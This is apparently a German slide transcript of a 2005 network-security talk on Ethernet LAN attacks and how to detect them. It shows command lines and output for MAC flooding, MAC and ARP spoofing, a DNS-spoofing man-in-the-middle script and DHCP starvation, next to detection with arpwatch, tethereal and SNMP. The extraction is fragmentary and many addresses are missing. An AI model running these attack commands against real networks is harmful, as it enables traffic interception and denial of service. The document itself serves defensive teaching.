Hacking the Ethernet

Transkript

1 Hacking the Ethernet 2B03 Andreas Aurand Network Consultant NWCC, HP 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Agenda Übersicht Sniffing MAC-Angriffe ARP Spoofing DNS Spoofing DHCP-Angriffe Andere LAN-Angriffe March 31, 2005 Andreas Aurand, HP Network Competence Center 2 1

2 Shared Ethernet Bus-Topologie. Alle Maschinen sind an einem gemeinsam genutzten Bus angeschlossen. Die einzelnen physikalischen Kabel sind über Hubs verbunden, Leiten jedes empfangene Paket an alle verfügbaren Ports weiter Jedes System kann den gesamten Datenverkehr sehen Shared Ethernet bietet keine Sicherheit Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind. Ethernetschnittstelle filtert Pakete, die nicht für sie bestimmt sind. Zielsystem F8-31-A4-2D Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben. Paket zum Zielsystem B Angreifer Sender March 31, 2005 Andreas Aurand, HP Network Competence Center 3 Switched Ethernet Systeme sind direkt am Switch angeschlossen. Leitet Pakete nur an Ports weiter, an denen MAC-Adresse des Zielsystems eingetragen ist. Diese Information ist in MAC-Adresstabelle gespeichert Tabelle kann auf verschiedenen Switchtypen unterschiedliche Größe haben Falls MAC-Adresse unbekannt ist, muss Switch die entsprechenden Pakete über alle Ports fluten. Unicast Flooding: Fluten der Pakete im gesamten Layer-2-Netzwerk Switch verhält sich wie ein Hub Pakete sind für Angreifer sichtbar Port 2/17 Zielsystem F8-31-A4-2D Zieladresse ist nicht in der MAC- Adresstabelle eingetragen. Switch flutet das Paket über alle Ports. Port Fa0/24 Zieladresse ist nicht in der MAC-Adresstabelle eingetragen. Switch flutet das Paket über alle Ports. Paket zum Zielsystem F8-31-A4-2D Sender B March 31, 2005 Andreas Aurand, HP Network Competence Center 4 2

3 Sniffing March 31, 2005 Andreas Aurand, HP Network Competence Center 5 Sniffing Angreifer versucht, in Besitz von sensitiven Daten zu gelangen Passwörter, vertrauliche Daten usw. Schnittstelle ist im Promiscuous Mode Default Gateway IP: / 21 MAC: C-07-AC-7B Angreifer (Host attack) IP: / 21 MAC: D-D6 March 31, 2005 Andreas Aurand, HP Network Competence Center 6 3

4 Promiscuous Mode Scanner Erkennen Schnittstellen, die im Promiscuous Mode laufen z.b. prodetect, Promiscan, anti_sniff oder Cain March 31, 2005 Andreas Aurand, HP Network Competence Center 7 Cain - MAC Scanner Host nicht im Promiscuous Mode March 31, 2005 Andreas Aurand, HP Network Competence Center 8 4

5 Cain - MAC Scanner Host im Promiscuous Mode March 31, 2005 Andreas Aurand, HP Network Competence Center 9 MAC-Angriffe March 31, 2005 Andreas Aurand, HP Network Competence Center 10 5

6 Switched Ethernet Aufbau der MAC-Adresstabelle Port 2/17 Sender F8-31-A4-2D Switch trägt die neue MAC- Adresse mit dem zugehörigen Port in seine Tabelle ein. Port Fa0/24 Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein. # show mac-address-table address 0000.F831.A42D Non-static Address Table: Destination Address Address Type VLAN Destination Port f831.a42d Dynamic 1 FastEthernet0/24 Zielsystem B MAC-Adresse ist in der Tabelle vorhanden Switch filtert Paket. Switch filtert Paket. Port 2/17 Zielsystem F8-31-A4-2D Port Fa0/24 Paket zum Zielsystem F8-31-A4-2D Sender B March 31, 2005 Andreas Aurand, HP Network Competence Center 11 MAC Flooding Angreifer versucht die MAC-Adresstabelle aufzufüllen Tools: macof oder pktgen linny:~ # macof -i eth1 -n macof: c:55:87:40:a3:81 -> 6a:b2:2a:33:a4:d6 macof: 2e:4d:22:56:a2:e5 -> 31:cc:e:1e:5b:6 macof: 3d:20:31:22:f6:c6 -> 43:a2:31:46:e0:c3 cat5000> (enable) show cam count dyn Total Matching CAM Entries = Pakete mit unterschiedlichen MAC-Quelladressen 2/17 Cat5000 1/2 Cat2924C Fa0/24 Rechner A Angreifer "attack" Paket für Rechner C 2/18 Paket für Rechner C Paket für Rechner C Paket für Rechner C Rechner C Rechner B March 31, 2005 Andreas Aurand, HP Network Competence Center 12 6

7 MAC Flooding Überlauf der Forwarding-Tabelle über SNMP auslesen.iso.org.dod.internet.mgmt.mib-2.dot1dbridge.dot1dtp.dot1dtplearnedentrydiscards # macof -i eth1 -n >/dev/null 2>&1 & # snmpget -c public mib (mib-2 = ) SNMPv2-SMI::mib = Counter32: 4427 March 31, 2005 Andreas Aurand, HP Network Competence Center 13 MAC Spoofing Angreifer verwendet MAC-Adresse eines bekannten Systems Angreifer kann Pakete nicht an das Zielsystem weiterleiten DoS-Angriff oder Rogue Server Default Gateway IP: MAC: 00:10:7b:36:4e:80 HTTP Server IP: MAC: F8-71-2E-B3 3/15 3/15 3/13 3/13 Angreifer IP: MAC: 00:60:97:80:9d:d6 Angreifer IP: MAC: 00:04:c1:7d:d6:54 Pakete mit Quelladresse: 00:60:97:80:9d:d6 Pakete mit Quelladresse: F8-71-2E-B3 attack# macchanger --mac=00:10:7b:36:4e:80 eth0 Current MAC: 00:60:97:80:9d:d6 (3com Corporation) Faked MAC: 00:10:7b:36:4e:80 (Cisco Systems, Inc.) March 31, 2005 Andreas Aurand, HP Network Competence Center 14 7

8 MAC Spoofing Forwarding-Tabelle nach MAC-Adresse durchsuchen MAC-Adresse in Dezimalwert umwandeln 00:10:7b:36:4e:80 = SNMP dot1tpfdbport-variable abfragen # snmpget mib SNMPv2-SMI::mib = INTEGER: 67 ifindex für Spanning-Tree-Portnummer suchen # snmpget mib SNMPv2-SMI::mib = INTEGER: 13 ifname für ifindex suchen snmpget mib IF-MIB::ifName.12 = STRING: 2/3 Portbezeichnung auf dem Switch ifindex-nummer Spanning-Tree Portnummer March 31, 2005 Andreas Aurand, HP Network Competence Center 15 Switchport zu MAC-Adresse zuordnen cammer (perl-skript, Teil von MRTG) #./cammer.pl public@ public@ * Gather VLAN index Table from Switch ARRAY(0x815acdc) * Gather Interface Name Table from Switch ARRAY(0x8171a9c) * Gather Arp Table from Router ARRAY(0x8171b38) * Gather Mac 2 Port and Port 2 Interface table for all VLANS 1/1 1 00:90:f2:40:bb:17 2/ :10:7b:36:4e:80 2/ :60:5c:f4:72:6f nixat2.frs-lab.de 2/12 1 aa:00:04:00:6f:fc c frs-lab.de 2/12 82 aa:00:04:00:6f:fc c frs-lab.de 2/ aa:00:04:00:6f:fc c frs-lab.de 2/ :0e:7f:5c:f6: p2650.frs-lab.de 2/ :0a:57:05:f5: p5308xl-2.frs-lab.de 2/ :0e:7f:5c:f6:f8 2/ :50:54:14:ab:fb 2/ :01:63:55:9b:07 2/ :00:f8:71:2a: cpsp.frs-lab.de 2/ :01:e7:96:a9: p5308xl-1.frs-lab.de 2/ :50:54:14:ab:ff cat5000-sup2.frs-lab.de 2/ :00:00:00:fe:00 2/ :10:7b:3b:5c:a c2501.frs-lab.de 2/ :01:63:55:9b:07 2/ :01:63:55:9b:07 2/ :01:63:55:9b:07 2/ :01:63:55:9b:07 2/9 1 00:10:7b:7f:b6:c c frs-lab.de March 31, 2005 Andreas Aurand, HP Network Competence Center 16 8

9 Netdisco Zuordnung einer MAC-Adresse zu einem Switchport March 31, 2005 Andreas Aurand, HP Network Competence Center 17 Netdisco Device-Informationen March 31, 2005 Andreas Aurand, HP Network Competence Center 18 9

10 Netdisco Netzwerk-Topologie March 31, 2005 Andreas Aurand, HP Network Competence Center 19 ARP-Guard Meldet automatisch MAC-Spoofing-Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 20 10

11 ARP-Guard Informationen über den Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 21 ARP-Guard Lokalisierung des Angriffs March 31, 2005 Andreas Aurand, HP Network Competence Center 22 11

12 ARP-Guard Übersicht über die verschiedenen Switchports March 31, 2005 Andreas Aurand, HP Network Competence Center 23 ARP Spoofing March 31, 2005 Andreas Aurand, HP Network Competence Center 24 12

13 Wie funktioniert der ARP Cache? Protokolltyp unterstützt? Ja Nein Nein Handelt es es sich um einen Request? Merge_Flag := False Eintrag für Senderpaar im im ARP Cache? Ja Eintrag im ARP Cache erneuern und Merge_Flag := := True 1 Ja Lokale HW- und Protokolladresse in in die Senderfelder eintragen Operation-Feld auf ares_op$reply setzen Nein Nein IP-Adresse des Zielsystems = lokale Adresse Reply-Paket als Unicast an anhw-adresse des Zielsystems senden Ja Merge Flag = False? Ja 2 Neuen Eintrag im ARP Cache anlegen Der ARP Reply wird immer als Unicast an die MAC-Adresse gesendet, die im Request-Paket als Sender MAC Address eingetragen ist. Nein March 31, 2005 Andreas Aurand, HP Network Competence Center 25 ARP Spoofing Bestehende Einträge im ARP Cache durch gefälschte ARP- Pakete modifizieren und neue Einträge hinzufügen ARP Spoofing oder ARP Cache Poisoning Ermöglicht DoS- und MitM-Attacken Gratuitous ARP ARP Reply Broadcast um einen bestehenden Eintrag auf allen Systemen des LANs abzuändern Häufig benutzt, um ARP-Eintrag des Default Gateway auf allen Hosts eines Subnetzes zu modifizieren March 31, 2005 Andreas Aurand, HP Network Competence Center 26 13

14 arpspoof Default Gateway IP: MAC: c-f4-72-6f # arp -a at 00:60:97:80:9D:D6 Angreifer (Host attack) IP: MAC: D-D6 Angriff über ARP Request oder Reply Angegriffene Rechner attack# arpspoof -i eth Ethernet II, Src: 00:60:97:80:9d:d6, Dst: ff:ff:ff:ff:ff:ff Address Resolution Protocol (reply) Opcode: reply (0x0002) Sender MAC address: 00:60:5c:f4:72:6f Sender IP address: Target MAC address: ff:ff:ff:ff:ff:ff (Broadcast) Target IP address: ( ) attack# arpspoof -i eth0 -t Ethernet II, Src: 00:60:97:80:9d:d6, Dst: 00:00:f8:71:2e:b3 Address Resolution Protocol (reply) Opcode: reply (0x0002) Sender MAC address: 00:60:97:80:9d:d6 Sender IP address: ) Target MAC address: 00:00:f8:71:2e:b3 Target IP address: Gratuitous ARP wird als Broadcast gesendet. March 31, 2005 Andreas Aurand, HP Network Competence Center 27 arpwatch ARPwatch erkennt Änderungen in der Zuordnung zwischen IP- und MAC-Adresse # arpwatch -dn -i eth1 -f /usr/local/var/log/arp.dat From: arpwatch (Arpwatch) To: root Subject: changed ethernet address (router.frs-lab.de) hostname: router.frs-lab.de ip address: ethernet address: 0:60:97:80:9d:d6 Nach dieser Adresse in der Forwardingethernet vendor: 3COM CORPORATION Tabelle suchen. old ethernet address: 0:60:5c:f4:72:6f old ethernet vendor: CISCO SYSTEMS, INC. timestamp: Sunday, February 6, :16: previous timestamp: Sunday, February 6, :15: delta: 1 minute March 31, 2005 Andreas Aurand, HP Network Competence Center 28 14

15 arpwatch # cat /usr/local/var/log/ arp.dat 0:60:5c:f4:72:6f router 0:60:97:80:9d:d router 0:0:f8:71:2a: cpsp 0:0:f8:71:2e:b unix 0:60:97:80:9d:d linny 0:0:f8:70:7c: pc March 31, 2005 Andreas Aurand, HP Network Competence Center 29 tethereal Statistik für ARP-Pakete mit tethereal erzeugen Anzeige der MAC-Adressen bei Summary-Ausgabe # more ~/.ethereal/preferences column.format: "Time", "%Yt","MAC Source", "%uhs", "MAC Destination", "%uhd", "Source", "%s", "Destination","%d", "Protocol", "%p", "Info", "%i" Script für periodische Statistik # cat arpstat #!/bin/bash while true; do tethereal -a duration:60 -qz conv,eth -i eth1 arp; date; done; March 31, 2005 Andreas Aurand, HP Network Competence Center 30 15

16 tethereal Erkennen von Gratuitous ARP # arpstat Capturing on eth1 44 packets captured ================================================================================ <- -> Total Frames Bytes Frames Bytes Frames Bytes 00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff :00:f8:71:2a:74 <-> 00:00:f8:71:2e:b :00:f8:71:2e:b3 <-> 00:60:97:80:9d:d ================================================================================ Fri Feb 4 15:28:19 MET Capturing on eth1 49 packets captured ================================================================================ <- -> Total Frames Bytes Frames Bytes Frames Bytes 00:60:97:80:9d:d6 <-> ff:ff:ff:ff:ff:ff :00:f8:71:2a:74 <-> 00:90:f2:40:bb: :00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff ================================================================================ Fri Feb 4 15:29:22 MET March 31, 2005 Andreas Aurand, HP Network Competence Center 31 tethereal Erkennen von "normalem" ARP Spoofing # arpstat Capturing on eth1 42 packets captured ================================================================================ <- -> Total Frames Bytes Frames Bytes Frames Bytes 00:60:97:80:9d:d6 <-> 00:00:f8:71:2e:b :00:f8:71:2e:b3 <-> 00:60:97:80:9d:d :00:f8:71:2a:74 <-> 00:60:5c:f4:72:6f :00:f8:71:2a:74 <-> 00:10:7b:7f:b6: :10:7b:7f:b6:60 <-> ff:ff:ff:ff:ff:ff :00:f8:71:2a:74 <-> ff:ff:ff:ff:ff:ff ================================================================================ Fri Feb 4 15:33:33 MET Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen. March 31, 2005 Andreas Aurand, HP Network Competence Center 32 16

17 ARP-Guard Meldet automatisch ARP-Spoofing-Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 33 ARP-Guard Informationen über den Angriff March 31, 2005 Andreas Aurand, HP Network Competence Center 34 17

18 ARP-Guard Lokalisierung des Angriffs March 31, 2005 Andreas Aurand, HP Network Competence Center 35 DNS Spoofing March 31, 2005 Andreas Aurand, HP Network Competence Center 36 18

19 DNS Spoofing Oft für Man-in-the-Middle-Attacken benutzt Verschlüsselte Verbindungen terminieren angreifendem Rechner SSH HTTPS Angreifer beantwortet DNS Query mit eigenem DNS Response Reply-Adresse ist seine eigene IP-Adresse Angreifer muss DNS Queries empfangen können ARP Spoofing MAC Flooding March 31, 2005 Andreas Aurand, HP Network Competence Center 37 DNS Spoofing Server (Host Session zwischen dem Angreifer und dem eigentlichen Server Default Gateway IP: / 21 MAC: F8-71-2E-B3 Angegriffener Rechner IP: / 21 MAC: AA FD DNS Server DNS Queries gehen immer zuerst zum Angreifer. DNS Angreifer Query (Host: (Host attack) IP: / 21 MAC: D-D6 DNS Response (Host: IP: ) Die DNS Response des Angreifers enthält seine IP-Adresse. March 31, 2005 Andreas Aurand, HP Network Competence Center 38 19

20 SSHv1 MitM-Attacke Fingerabdruck des öffentlichen Server Keys 38:23:ef:ab:34:13:43:ce:16:3d:c0:c5:dc:d4:93:5b SSH Server (Host SSH Session zwischen dem Angreifer und dem eigentlichen Server. Angegriffener Rechner (Host pcdepp) IP: SSH Session zwischen dem Client und dem Angreifer. DNS Server Default Gateway IP: / 21 Angreifer (Host attack) IP: March 31, 2005 Andreas Aurand, HP Network Competence Center 39 dnsspoof (dsniff-tool) Script für DNS Spoofing attack# cat mitm # # Enable Forwarding and disable sending ICMP Redirects # echo "1" > /proc/sys/net/ipv4/ip_forward echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects # # Enable ARP and DNS Spoofing IP-Adresse des Default Gateway # arpspoof -i eth >/dev/null & dnsspoof -i eth0 -f dnsspoof.hosts host >/dev/null & # cat dnsspoof.hosts IP-Adresse des angegriffenen Rechners IP-Adresse, die vom Angreifer als Reply auf einen DNS Request für zurückgesendet wird. March 31, 2005 Andreas Aurand, HP Network Competence Center 40 20

21 tethereal Erkennen von DNS Spoofing durch tethereal # tethereal -lni eth1 not ether src 00:00:f8:71:2e:b3 and udp src port 53 Capturing on eth :02: :60:97:80:9d:d6 -> aa:00:04:00:37:fd > DNS Standard query response A :02: :60:97:80:9d:d6 -> aa:00:04:00:37:fd > DNS Standard query response A Anschließend kann man Switchport für die MAC-Adresse 00:60:97:80:9d:d6 über Bridge MIB bestimmen. March 31, 2005 Andreas Aurand, HP Network Competence Center 41 DHCP-Angriffe March 31, 2005 Andreas Aurand, HP Network Competence Center 42 21

22 DHCP Rogue Server Angreifer setzt eigenen DHCP-Server ab um Clients mit falschen Informationen zu versorgen. Ermöglicht DoS- als auch MitM-Attacken Falls DHCP Client die IP-Adresse vorgibt, funktioniert Angriff nicht Default Gateway Angegriffener DHCP Client Normaler DHCP Server Angreifender Rogue Server Rückverkehr geht vom Default Gateway direkt zum Client. Alle vom Client gesendeten Pakete gehen über den Angreifer. DHCP Offer mit als Default Gateway March 31, 2005 Andreas Aurand, HP Network Competence Center 43 DHCP Gobbler IP-Adressen für Gateway (G), DNS-Server (D) und DHCP-Server (A) attack#./gobbler -m 1 -D G A DHCP gobbler v0.66 from Man the middle attack Trying to gobble address to be used in man in the middle attack DHCP Discover packet constructed and injected, wrote all 342 bytes Sniffing DHCP packets... Got a DHCP OFFER packet DHCP request packet constructed and injected, wrote all 342 bytes Sniffing DHCP packets... Got a DHCP ACK packet gobbled... Total: 1 Rogue Server allokiert eine Adresse Address(es) to be spoofed vom richtigen DHCP-Server. Sniffing for discover messages Sniffing DHCP packets... Got A DHCP discover packet... a host is trying to find a valid IP Time to do the dirty work DHCP Offer packet constructed and injected, wrote all 342 bytes Sniffing DHCP packets... got a dhcp request packet Transaction compare passed... Request IP: Wenn Client ein DHCP Discover sendet, schickt Rogue Server ein DHCP Offer mit der gestohlenen IP-Adresse Offerd IP: sowie den Informationen über das neue Default Gateway und den neuen DNS-Server an Client zurück. Sent + Requested IP's match... sending ack Creating an Ack packet DHCP ACK packet constructed and injected, wrote all 342 bytes Man in the middle should be established m00 m4m4m4m4 Just checking incase of other servers weren't happy (waiting for 10 seconds) Sniffing DHCP packets... March 31, 2005 Andreas Aurand, HP Network Competence Center 44 22

23 tethereal tethereal protokolliert DHCP Replies, die andere MAC- Adresse als der eigentliche DHCP-Server verwenden. MAC-Adresse des "richtigen" DHCP-Servers. # tethereal -Nmnt -li eth1 not ether src aa:00:04:00:6f:fc and udp dst port 68 Capturing on eth :12: :10:7b:7f:b6:c1 -> ff:ff:ff:ff:ff:ff > DHCP DHCP Offer - Transaction ID 0x133b Anschließend kann man Switchport für die MAC-Adresse 00:10:7b:7f:b6:c1 über Bridge MIB bestimmen. March 31, 2005 Andreas Aurand, HP Network Competence Center 45 DHCP Starvation Angreifer spooft den DHCP Packet Exchange Fordert alle verfügbaren IP-Adressen vom Servers an Server kann Clients keine Adresse mehr zuweisen DoS-Attacke auf den DHCP-Server. DHCP-Server Da DHCP-Server seine ganzen Adressen vergeben hat, kann er DHCP Requests der Clients nicht mehr beantworten. DHCP Request Vorgetäuschter DHCP-Paketaustausch Angreifer DHCP Clients attack# DHCPGobbler -g Detecting DHCP service for gobble attack DHCP server at 1A offering with subnet mask gateway and DNS gobbled using MAC 0:28:c:a8:5e:a gobbled using MAC 0:a8:25:24:5e: gobbled using MAC 0:48:c4:b3:a9:a gobbled using MAC 0:3c:63:ab:41:f gobbled using MAC 0:73:92:a7:75:1b. Für jede Anforderung muss eine neue MAC-Adresse verwendet werden March 31, 2005 Andreas Aurand, HP Network Competence Center 46 23

24 tethereal tethereal protokolliert alle DHCP Requests # ethereal -a duration:300 -i tu0 -qz conv,ether udp dst port 67 ================================================================================ Ethernet Conversations Filter:<No Filter> <- -> Total Frames Bytes Frames Bytes Frames Bytes 08:00:2b:2b:98:32 <-> ff:ff:ff:ff:ff:ff :00:2b:93:2f:8a <-> ff:ff:ff:ff:ff:ff :00:2b:a2:7d:08 <-> ff:ff:ff:ff:ff:ff ================================================================================ March 31, 2005 Andreas Aurand, HP Network Competence Center 47 Andere LAN-Attacken March 31, 2005 Andreas Aurand, HP Network Competence Center 48 24

25 Andere LAN-Attacken Spanning-Tree-Attacken Schutz durch richtige Konfiguration der Switches Festlegen an welchen Ports andere Switches angeschlossen werden dürfen Festlegen über welche Ports die Root Bridge gesehen werden darf VLAN-Attacken Schutz durch richtige Konfiguration der Switches Eigenes VLAN für Trunk-Verbindungen VLAN 1 nicht verwenden March 31, 2005 Andreas Aurand, HP Network Competence Center 49 file2cable sendet Binärdatei als Ethernet Frame # tethereal -x -ni eth0 ether dst 01:80:c2:00:00:00 Capturing on eth :01:63:55:9a:f1 -> 01:80:c2:00:00:00 STP Conf. Root = 0/00:0e:7f:5c:f6:80 Cost = 3019 Port = 0x c a f cU...&BB e 7f 5c f \ b cb a PT...B f xxd: Umwandlung der Text- in eine Binärdatei. Der mit tethereal erzeugte HEX Output wird in die Datei stp.txt kopiert. # xxd -r stp.txt stp.bin # file2cable -v -i eth0 -f stp.bin file2cable - by FX <fx@phenoelit.de> Thanx got to Lamont Granquist & fyodor for their hexdump() stp.bin - 60 bytes raw data 0180 c af cU...&BB e 7f5c f \... 0bcb a PT...B f Packet length: 60 March 31, 2005 Andreas Aurand, HP Network Competence Center 50 25

26 Netdisco Anzeige der Ports, die auf Blocking stehen March 31, 2005 Andreas Aurand, HP Network Competence Center 51 LAN-Sicherheit March 31, 2005 Andreas Aurand, HP Network Competence Center 52 26

27 Tools DSNIFF Tools (macof, arpspoof, dnsspoof, sshmitm ) Cain Ethereal (tethereal) Netdisco March 31, 2005 Andreas Aurand, HP Network Competence Center 53 Tools macchanger arpwatch DHCP Gobbler file2cable March 31, 2005 Andreas Aurand, HP Network Competence Center 54 27

28 Tools MRTG (Multi Router Traffic Grapher) contrib/cammer ARP-Guard (kommerziell) ARP Spoofing MAC Spoofing MAC Flooding Zuordnung zwischen Switchport und MAC-Adresse March 31, 2005 Andreas Aurand, HP Network Competence Center 55 Fragen???????? March 31, 2005 Andreas Aurand, HP Network Competence Center 56 28